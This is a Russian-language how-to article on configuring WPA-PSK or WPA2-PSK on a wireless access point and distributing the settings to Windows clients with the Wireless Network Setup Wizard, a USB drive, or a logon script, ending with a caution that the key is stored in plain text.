Чтобы использовать WPA-PSK или WPA2-PSK для вашей беспроводной сети, вы должны сначала иметь точку доступа (AP), которая поддерживает один или оба стандарта. Многие точки доступа теперь включают поддержку обоих одновременно, что полезно, если у вас есть несколько беспроводных клиентов. Некоторые высокопроизводительные точки доступа даже поддерживают одновременное использование WPA, WPA2 и WEP. Следуйте инструкциям, прилагаемым к вашей точке доступа, чтобы установить идентификатор набора служб (SSID — идентификатор беспроводной сети), выбрать WPA или WPA2 или оба варианта и ввести предварительно общий ключ.Выберите надежный ключ, который не может быть легко угадан мошенническим беспроводным клиентом .

После настройки точки доступа я рекомендую вам использовать один ноутбук или настольный беспроводной клиент для проверки подключения. Во-первых, убедитесь, что беспроводной клиент поддерживает WPA или WPA2. Для этого откройте Панель управления, Сетевые подключения и щелкните правой кнопкой мыши адаптер беспроводной сети. Выберите «Свойства» в меню и перейдите на вкладку «Беспроводные сети». Попробуйте найти свою сеть, нажав кнопку «Просмотр беспроводных сетей», или вы можете нажать «Добавить», чтобы добавить сеть вручную.На рис. A показана конфигурация WPA-PSK для новой сети.

Хотя вы можете использовать групповую политику для распространения параметров WPA-PSK и WPA-PSK2 среди клиентов беспроводной сети, вы не можете использовать ее для распространения общих ключей. Я также не рекомендую вам давать предварительный общий ключ пользователям для самостоятельного входа. Вместо этого вы можете использовать мастер настройки беспроводной сети из панели управления, чтобы записать параметры беспроводной сети и настроить других клиентов беспроводной сети.

При запуске мастера вы увидите два варианта задач: Настройка новой беспроводной сети и Добавление новых компьютеров или устройств в сеть .Выберите вариант добавления новых компьютеров и нажмите Далее. Выберите Использовать флэш-накопитель USB (рекомендуется) и нажмите Далее. Вставьте флэш-накопитель в USB-порт на вашем компьютере и выберите его из раскрывающегося списка «Флэш-накопитель», как только он будет обнаружен, затем нажмите «Далее». Ваши настройки беспроводной сети и небольшая служебная программа копируются на флэш-накопитель, а накопитель настроен на автоматический запуск утилиты каждый раз, когда он вставляется в машину. Отключите флэш-накопитель и вставьте его в каждый из ваших беспроводных клиентов (вы должны войти в систему как пользователь, который будет использовать машину в первую очередь).В качестве альтернативы, если ваши пользователи используют смешанные проводные и беспроводные сети, вы можете скопировать программу (setupSNK.exe) и папку smrtntky и ее содержимое в общую папку. Затем настройте сценарий входа для сопоставления папки с буквой диска на компьютере пользователя и запустите setupSNK.exe.

Связанный: Беспроводной контроллер для управления точками доступа?

После запуска программы вы можете отключить компьютеры от проводной сети и получить доступ к беспроводной сети. Предостережение: Общий ключ хранится в виде обычного текста в двух файлах в папке smrtntky.

Leave a comment